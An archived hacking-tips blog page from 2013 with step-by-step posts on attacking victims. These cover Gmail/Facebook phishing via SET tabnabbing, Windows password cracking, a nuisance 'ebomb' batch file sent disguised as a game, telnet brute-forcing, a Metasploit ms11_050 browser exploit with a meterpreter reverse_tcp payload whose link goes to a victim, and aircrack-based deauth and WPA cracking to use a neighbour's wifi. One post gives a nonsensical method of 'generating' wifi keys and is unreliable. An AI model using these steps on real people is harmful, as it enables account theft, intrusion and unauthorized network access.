free software for you: Hack Tips
Showing posts with label Hack Tips. Show all posts
Showing posts with label Hack Tips. Show all posts

Friday, September 13, 2013

How to Hack Facebook , Gmail with Backtrack 5

First open your backtrack terminal and type ifconfig to check your IP


Now Again Open Your Backtrack terminal and Type cd  /pentest/exploits/set
Now Open Social Engineering Toolkit (SET) ./set
Now choose option 2, “Website Attack Vectors”.
In this option we will select option 4 “Tabnabbing Attack Method”.
In this option we will choose option 2 “Site Cloner”.
Enter the URL of the site you want to clone. In this case http://www.gmail.com and hit enter. SET will clone up the web site. And press return to continue.
Now convert your URL into Google URL using goo.gl and send this link address to your victim via Email orChat.
When victim open in their browser it should be a message that the page is still loading. so victim start to open another tab. As soon as victim open new tab, our fake website start working. That script will redirect the victim to the phishing page your derived.


Sunday, September 8, 2013

How To Hack Windows 7 Password Using Ophcrack 2013

hacking windows 7 password

In this tutorial i will teach you to hack Windows 7 password using free open source software called ophcrack. This hack also works on Windows XP and Windows Vista. So let get started.

What Is Ophcrack ?

Opcrack is an open source windows password cracker based on rainbow tables. It comes with Graphical user interface(GUI) and runs on multiple platform such windows, linux and mac.  It allows you to recover or hack windows password.

How To Crack Windows 7 Password Using Ophcrack ?

Before you start doing this you will need a blank CD or DVD to burn the live image of ophcrack.

  1. Download Opcrack Live Cd by Clicking Here. Download windows xp or windows 7 live cd depending on platform you are wishing to hack. For example:
  • Windows 7 or Windows Vista: Click on ophcrack Vista/7 LiveCD.
  • Windows XP: Click on ophcrack XP LiveCD.
  2. Now burn the live image on to the cd.
  3. Insert the disc into drive and restart you computer.
  4. If everything goes right you will see screen like below.
  5. After you see screen like above wait for ophcrack to boot automatically or you may press Enter to advance.
  6. Now you will see several lines of code printed on screen or they might disappear very quickly (you dont need to worry about that).
  7. Then you will see screen like below it is ophcrack password recovering software. At the Ophcrack screen it shows the Administrator and Guest account. Notice the word “empty”. This means that if the account is enabled you could log in without a password.

windows 7 password hacking
  8. Ophcrack WILL NOT CRACK THE PASSWORD because the hash table which it needs is not available for free. But it does show the NTLM hash.
  9. Copy this hash value which is under NT Hash field.
 10. Navigate to http://crackstation.net/ which is an online hash cracking tool.
 11. Type in the hash value you copied down in step 9, Enter the captche and click on

Tuesday, July 30, 2013

How to become World No 1 Hacker

 hacking ebooks
  
This book will give you information on different concepts of hacking like cracking wireless network,hacking cell phone and many more. Below is the full list of hacking topics included in this book.

    *Attack Basics
    *Password Basics
    *Account Basics
    *Denial of Service Basics (DOS)
    *Logging Basics
    *Spyware
    *Port Scanning
    *Unix remote attack
    *SQL injection
    *Spoofing and Hijacking
    *Social Engineering
    *How to become hacker in 15 minutes
    *Making money as Hacker

 

NOTE: Password for the rar file is tricks4u




Monday, July 29, 2013

Hacking for Begineers E-Book Free Download

Hacking For Begineers
Hacking for begineers, as the name says is completely for begineers you can begin your hacking journey with this book or Hackers underground handbook both are amazing books for noobs. The book is well written and you will enjoy reading it. More Ebooks and tutorials are own its way so subscribe below and dont miss them. Below are some topics covered in this book.

    *Concept of Ethical hacking
    *Email Hacking
    *Windows Hacking
    *Linux Hacking
    *Wireless Hacking
    *Mobile Hacking
    *Trojans

   Note : Password for the rar file is tricks4u

                             DOWNLOAD EBOOK

Tuesday, July 23, 2013

Hackers Underground Hand E-Book Free Download

hackers underground handbook

            Hackers underground Handbook is really nice for begineers. It contain some begineers as well as advance hacking tutorials. You can ask for any Ebooks by commenting below i will provide you. If you like my post then subscribe below for such more great ebooks and tutorials Also like my Facebook Page. The content of book is listed below:
  •     Concept of Hacking
  •     Programming
  •     Linux
  •     Network Hacking
  •     Wireless Hacking
  •     Windows Hacking
  •     Web Hacking
  •     Malware

NOTE : Password for the rar file is tricks4u




Monday, July 15, 2013

How to Hack with Ethical Hacking Guide

Any one running a website related to Hacking gets this question asked daily “How to Hack?”Most of us are curious to learn hacking but dont know where to start,so I am writing this article for all those people who want to Learn Hacking and dont know where to start or want to Learn Hacking from Basics
While surfing on web I came across a Book “A Beginners Guide To Ethical Hacking”, The book was so simple that even a D-Grade Script kiddie can become a master Hacker.


A Beginner’s Guide to Ethical Hacking

image1 Learn how to hack with Ethical Hacking Guide 




 What things will I learn In this book?
  • You will learn All Ethical hacking techniques and also you will learn to apply them in real world situation
  • You will start to think like hackers
  • Secure your computer from trojans, worms, Adwares, etc.
  • Amaze your friends with your newly learned tricks
  • You will be able to protect your self from future hack attacks
  • And Much more…
This book will take you from the core to the top. It will tell you how to hack, and how to defend yourself from malicious hack attacks in simple steps. It’s a great source for the beginner who want to become a Hacker. This will install a Hacker’s Mindset on you.
Special Offers for you
Along with this E-book you will get 2 bonus packs for free.
  • 1000 Hacking Tutorial : Hacking Tutorials contains1000 of the best hacking tutorials of 2010 leaked on the internet!
  • Set of Phishers : You will also get a set of 30+ phishers(Fake login page) created by Rafay Baloch.
If you think this book is something you would be interested in, you can get it here. A Beginners Guide To Ethical Hacking

 

Source - www.hacktweaks.com

Thursday, July 11, 2013

Ebomb a Virus for Fun

This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type
@echo off
start iexplore
start notepad
start firefox
and save it as anyname.bat (note: paste the code with “start ” in many times to annoy them)
you can also do some additional stuff like enter the message for victim eg. msg * “(Now your pc is getting Hacked)”
and also you can open some websites to irritate victim eg.
start iexplore “www.trickxworld.info”
start firefox “www.trickxworld.info”
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it ………….. :D
(Sample eg.
@echo off
msg * “(sorry buddy but you just f*$%d your self)”
start iexplore “trickxworld.info”
start firefox “www.trickxworld.info”
start notepad
start iexplore “trickxworld.info”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “trickxworld.info”
start firefox “www.trickxworld.info”
start notepad
start iexplore “trickxworld.info”
start firefox “www.trickxworld.info”
start notepad
start iexplore “trickxworld.info”
start firefox “www.trickxworld.info”
start notepad
start iexplore “trickxworld.info”
start firefox “www.trickxworld.info”
start notepad
start iexplore “trickxworld.info”
start firefox “www.trickxworld.info”
start notepad
start iexplore “trickxworld.info”
start firefox “www.trickxworld.info”
start notepad
start iexplore “trickxworld.info”
start firefox “www.trickxworld.info”
start notepad
start iexplore “trickxworld.info”
start firefox “www.trickxworld.info”
start notepad
start iexplore “trickxworld.info”
start firefox “www.trickxworld.info”
start notepad
start iexplore “trickxworld.info”
start firefox “www.trickxworld.info”
start notepad
start iexplore “trickxworld.info”
start firefox “www.trickxworld.info”
start notepad
start iexplore “trickxworld.info”
start firefox “www.trickxworld.info”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.trickxworld.info”
start notepad
and then simply save it as “anyname.bat”
Note : The only way to get out of any ebomb attack is simply by System restart

Monday, July 8, 2013

How to Hack Remote Computer Using IP Address 2013

Literally, hacking is accessing something or somebody in internetwithout their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.
You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.
Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.
Well, both of the hacking has the same process. Let’s summarize what we must do.



  1. Confirm the website or a computer you want to hack.
  2. Find or trace their IP address.
  3. Make sure that IP address is online
  4. Scan for open ports
  5. Check for venerable ports
  6. access through the port
  7. Brute-force username and password
Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com
This is how we can get the IP address of the victims website.
How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.
One of the widely used method to detect IP address of your friend is by chatting with him.
Now you got the IP address right? Is it online?
To know the online status just ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.
Use Advanced Port Scanner to scan all open and venerable ports.
Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.
Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port]
You’ll be asked to input login information.


If you can guess the information's easily then it’s OK. Or you can use some brute-forcing tools like this one.

Thursday, July 4, 2013

wiFiSlax 4.5 Final WiFi Hack BootCD - ISO 2013

WifiSlax is a type of Slax OS made exclusively for wireless hacking. It comes with a bunch of wireless tools preloaded into it. These include Aircrack, Airsnort, kismet, madwifi drivers and many more...
Features
- Focused on Wireless Audit
- Latest tools for Wireless Audit
- Drivers of the most common chipsets in our laptops (innovating with packet injection support)
- Ease of use for the uninitiated in GNU/Linux
- Launchers and GUI tools
- GNU/Linux distribution
- Debian Stable based
- Nowadays, not only Wireless Security: /NETWORK VULNERABILITY & PENTESTING /BLUETOOTH /RFID /IRDA /SERIAL PORT /CRACKING /REVERSING /FORENSIC
- Compatible with other system
- GRUB as boot loader
- Live CD/DVD/USB
- Kernel 2.6.32.5 SMP
- KDE 3.5.10|KDE 4? Compiz Fusion included Drivers ATI / Drivers NVIDIA
- Automount new drives RO/RW over NTFS, HFS and NAS
- Automount new devices Wireless devices / mouse / etc
- Ease of use regardless of driver
- Launch GUI: Broadcom bcm43xx Intel IPW2200, IPW3945, IPW4965 Ralink rt2570, rt73 Prism, Prism2 Realtek rt8180/rt8185, rt8187 Atheros mode managed, monitor, master
- Problems with your chipset? usbview, lsusb, lspci, dmesg, etc...
- Audit & security tools
- Wireless chipsets for auditing & pentesting
- Wireless tools Kismet, machanger, aircrack-ng, aircrack-ptw, etc
- Cryptanalysis tools (WEP/WPA/WPA2, cookie entropy, etc)
Basic Instructions:
1)Boot from cd
2)Get the wep key
3)Write it down
4)Reboot into windows
5)Connect using wep key. 

Sunday, June 30, 2013

How to Hacking a Remote Windows 7 Using Metasploit

Hey friends I am back with a blasting post on hacking windows.So, I will give you a little introduction about this post. In this post i am gonna hack or control a remote windows 7,xp using metasploit.So let we start hacking.
Follow all steps according to this post ======>
1. Open metasploit in windows or in backtrack.

2. After opening this just type this code  use exploit/windows/browser/ms11_050_mshtml_cobjectelement.
3. Now type set payload windows/meterpreter/reverse_tcp
4. Now type set  lhost  192.168.1.2  in place of 192.168.1.2 type your ip address.
5. Now type set srvhost 192.168.1.2  in place of 192.168.1.2 type your ip address.
6. Now type set uripath adityahackingarticles.
7. Now type exploit.
9. Now a server will be created on ur ip and send the link http://uripaddress/adityahackingarticles send this link to your victim.
10. Now when your victim open ur link he will be hacked and then type sessions -l to start exploiting the victim.
Note : For only Education

Friday, June 7, 2013

Hack Wi-Fi Hotspot Password Using Linux Backtrack 2013



Hack Wi-Fi Hotspot Password Using Linux Backtrack

This tutorial will show you how to easily Hack, Bypass or Creak anyWEP/WPA/WPA2 Wi-Fi hotspot password using Linux Backtrack program and It will take you only 10 very easy steps to follow and you are done.

Using Linux backtrack you can easily hack or steal your neighbor Wi-Fi internet password and use his/her internet connection without paying any internet bill.

Now Follow This Steps:

Step 1: Run VMware and open Backtrack iso.

Step 2: Open Shell Consol after start Backtrack.

Step 3: Type airmon-ng and hit enter. It will show you interface, chipset, driver, etc.

Step 4: Type airodump-ng wlan0 and hit enter. Wait a while when it is searching for available connections.

Step 5: You can see a list. Chose a hotspot name you want to hack.

Step 6: Copy the ch value of your selected connection. Then type airdump-ng-c and past ch value just after this. Next to the ch value type –bssid space your bssid number and -w wep_hack wlan0 and press enter.

(Example:  airdump-ng-c ch value –bssid 00:1F:9F:73:C0:45 -w wep_hack wlan0)

Step 7: Wait and do not close the window.

Step 8: If this window has finished then open a new shell console and type dir and hit enter.

Step 9: Type aircrack-ng -a 1 –b and your bssid.

(example: aircrack-ng -a 1 -b 00:1F:9F:73:C0:45 wep_hack-01.cpp)

Step 10: If you have seen this text decrypted correctly 100%, it means you have successfully done this process.

Now you can see you desired Wi-Fi password just above this massage.


DOWNLOAD

1. A configured wireless router/WLAN card installed on your PC.
2. VMware Workstation.
3. Backtrack

Wednesday, May 22, 2013

BackTrack Hacking Course DVD 2013 Free Download



Download Free 7GB Backtrack Hacking Course DVD. 

Info:Backtrack Hacking Course DVD

Size: 7GB
Type: Torrent
Along With 45+ Modules

1 Hacking Basics -MD52

2 Website Hacking -Sql Injection

3 Website Hacking -xss

4 Staying Secure

5 Modding Xbox Softmod

6 Wireless Hacking - Cracking WPA

7 Triple Boot

9 Local Password Cracking

10 Lockpicking Basics

11 Ettercap

12 Xss Tunnel

13 Playstaion 2 Softmod

14 cracking WEP update

15 Bypass Hotspot's Acesss Controls

16 Lockpicing DUmpkey

17 Phone Phreaking -Begie Box

18 Phone Phreaking -Snifing VOIP

19 Lockpicking DIY Padlock

20 Cracking WEP

21 LOckingPicking Multi-Disc

22 Network Hacking -Arp Poisoning

23 wordpress Social Engineering

24 Metasploit Autopwn

25 Application Patching

26 Windows SMB relay Exploit

27 Password Phising

28 CoMbine Files

29 Manipulating Windows User account

30 Torjan Basics

31 Evilgrade

32 Dwonfalls of Anti-Virus software

33 Home Made Lock Pics

34 Fix Google Mail Enumerator

35 VMWARE

36 Bluetooth Hacking

37 Windows Privilage Escalation

38 Local File Inclusion

39 Alternate Data Streams

40 CSRF

41 INSTALL BACKTRACK ON USB

42 Ardunio Arp Cop

43 Beer Pong Table

44 Bypass Cisco Clean Access & Cisco NAC Appiance

45 DNS SPOOF virtual Hosts

46 Deep Freeze

47 Email Injecion

48 Extracting Database Information

49 Ping of Death





Tuesday, May 21, 2013

Crack Wifi PassWord Hacker Tips 2014


Have Wireless signals in your area? but cant use them cuz they have security? This Tut will tell you how too use nettools 5 to get into them,

First you need too see what wireless networks are in your area,
this is pretty simply first,

Open Control Panel

[Image: 795c8a29576c338676e782d2faeeb322.png]

Then view network status and tasks,

[Image: 0b0d3abcbd394834bb9187400e69fa0a.png]

Then click on manage wireless networks,
[Image: a4b5d2808c38aca4f781c858e63c7fc3.png]



Once you find what kinda security it has, as high lighted below, open nettools
[Image: 4055c6c725ab8042e648efbe020cf48a.png]

NetTools Side of TuT,
[Image: 336d30f23dfffe69a46ff389ab914b1d.png]

Once you have nettools open, then, Start> Network Tools> WEP/WPA Key Generator, it should look like it is below,


Once Open, select the type of security that the Wireless network your trying to get into has, then select "Hex (0-9,A-F)",


Now you Need too select a Key Length, the best one too use is, 64/40 bits, once you have done that,Be sure to click on the Calculate Key Space,

[Image: 55f862bcc8fea91a613c4e3b1924cca5.png]

Now simply hit Generate Code, and your code will appear,

[Image: 84ccac40013391bd19c6ede7c5b6ebbc.png]

Now simply copy and paste that into the password bar, when prompt to, when your connecting too the Wireless signal,


Monday, May 13, 2013

How to Secure Your WiFi Connection 2013





In this Post i am going to tell how you can secure your PC WiFi Connection in some simple steps.we all know that security of our WiFi Connection is how Important for us. to prevent to your WiFi Signal/Connection to being use by other People.use my Five steps to secure your WiFi Connection

1. Install a Firewall A firewall helps protect your PC by preventing unauthorized users from gaining access to your computer through the Internet or a network. It acts as a barrier that checks any information coming from the Internet or a network, and then either blocks the information or allows it to pass through to your computer.

2. Change the Administrative Password on your Wireless Routers Each manufacturer ships their wireless routers with a default password for easy initial access. These passwords are easy to find on vendor support sites, and should therefore be changed immediately.

3. Change the Default SSID Name and Turn Off SSID Broadcasting This will require your wireless client computers to manually enter the name of your SSID (Service Set Identifier) before they can connect to your network, greatly minimizing the damage from the casual user whose laptop is configured to connect to any available SSID broadcast it finds. You should also change the SSID name from the factory default, since these are just as well-known as the default passwords

4. Disable DHCP For a SOHO network with only a few computers, consider disabling DHCP (Dynamic Host Configuration Protocol) on your router and assigning IP addresses to your client computers manually. On newer wireless routers, you can even restrict access to the router to specific MAC addresses.

5. Replace WEP with WPA WEP (Wired Equivalent Privacy) is a security protocol that was designed to provide a wireless computer network with a level of security and privacy comparable to what is usually expected of a wired computer network. WEP is a very weak form of security that uses common 60 or 108 bit key shared among all of the devices on the network to encrypt the wireless data. Hackers can access tools freely available on the Internet that can crack a WEP key in as little as 15 minutes. Once the WEP key is cracked, the network traffic instantly turns into clear text – making it easy for the hacker to treat the network like any open network. WPA (Wi-Fi Protected Access) is a powerful, standards-based, inter-operable security technology for wireless computer networks. It provides strong data protection by using 128-bit encryption keys and dynamic session keys to ensure a wireless computer network's privacy and security. Many cryptographers are confident that WPA addresses all the known attacks on WEP. It also adds strong user authentication, which was absent in WEP.

Saturday, May 11, 2013

Hacking Top 10 E Books For Free Download 2013





  1. Ankit Fadia Hacking Guide
  2. Batch File Programming by Ankit Fadia
  3. Defacing Website, A step by step process by Ankit Fadia
  4. Untold windows tips and secrets by Ankit Fadia
  5. Dos Attack by Ankit Fadia
  6. Encryption Algorithm Explained by Ankit Fadia
  7. FTP Exploits by Ankit Fadia
  8. Tracing IP,DNS,WHOIS-nsLOOKUP by Ankit Fadia
  9. Transparent Proxies with Squid by Ankit Fadia
  10. Truth !! what they don't teach in manual




Tuesday, May 7, 2013

How To Make Crack A WPA Key With Aircrack 2014


With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).

Network Adapter I am going to use for WPA/WPA2 cracking is Alfa AWUS036H , OS# Backtrack 5R2

Step 1 : Setting up your network device

To capture network traffic wihtout being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type:
Command # iwconfig (to find all wireless network interfaces and their status)




Command # airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)


Step 2 : Reconnaissance 

This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:

Command # airodump-ng mon0 (Monitors all channels, listing available access points and associated clients within range.


Step 3 : Capturing Packets 

To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packets on channel 1 into a text file called data:

Command # airodump-ng -c 1 bssid AP_MAC -w data mon0 


Step 4 : De-Authentication Technique 

To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point, MAC_Client is the MAC address of an associated client.


So, now we have successfully acquired a WPA Handshake.


 Step 5 : Cracking WPA/WAP2 

Once you have captured a four-way handshake, you also need a large/relevant dictinary file (commonly known as wordlists) with common passphrases.

Command # aircrack-ng -w wordlist ‘capture_file’.cap (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake) 


Cracking WPA-PSK and WPA2-PSK only needs (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files.
Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack.

    Tuesday, April 30, 2013

    WiFiSlax 4.3 Final (WiFi Hack BootCD)


    WiFiSlax 4.3 Final (WiFi Hack BootCD)

    WiFiSlax 4.3 Final (WiFi Hack BootCD)  | 551 MB

    WifiSlax is a type of Slax OS made exclusively for wireless hacking. It comes with a bunch of wireless tools preloaded into it. These include Aircrack, Airsnort, kismet, madwifi drivers and many more...

    Features

    - Focused on Wireless Audit
    - Latest tools for Wireless Audit
    - Drivers of the most common chipsets in our laptops (innovating with packet injection support)
    - Ease of use for the uninitiated in GNU/Linux
    - Launchers and GUI tools
    - GNU/Linux distribution
    - Debian Stable based
    - Nowadays, not only Wireless Security: /NETWORK VULNERABILITY & PENTESTING /BLUETOOTH /RFID /IRDA /SERIAL PORT /CRACKING /REVERSING /FORENSIC
    - Compatible with other system
    - GRUB as boot loader
    - Live CD/DVD/USB
    - Kernel 2.6.32.5 SMP
    - KDE 3.5.10|KDE 4? GÇô Compiz Fusion included GÇô Drivers ATI / Drivers NVIDIA
    - Automount new drives GÇô RO/RW over NTFS, HFS and NAS
    - Automount new devices GÇô Wireless devices / mouse / etc
    - Ease of use regardless of driver
    - Launch GUI: GÇô Broadcom bcm43xx GÇô Intel IPW2200, IPW3945, IPW4965 GÇô Ralink rt2570, rt73 GÇô Prism, Prism2 GÇô Realtek rt8180/rt8185, rt8187 GÇô Atheros mode managed, monitor, master
    - Problems with your chipset? GÇô usbview, lsusb, lspci, dmesg, etc...
    - Audit & security tools
    - Wireless chipsets for auditing & pentesting
    - Wireless tools GÇô Kismet, machanger, aircrack-ng, aircrack-ptw, etc
    - Cryptanalysis tools (WEP/WPA/WPA2, cookie entropy, etc)


    Basic Instructions:

    1)Boot from cd
    2)Get the wep key
    3)Write it down
    4)Reboot into windows
    5)Connect using wep key.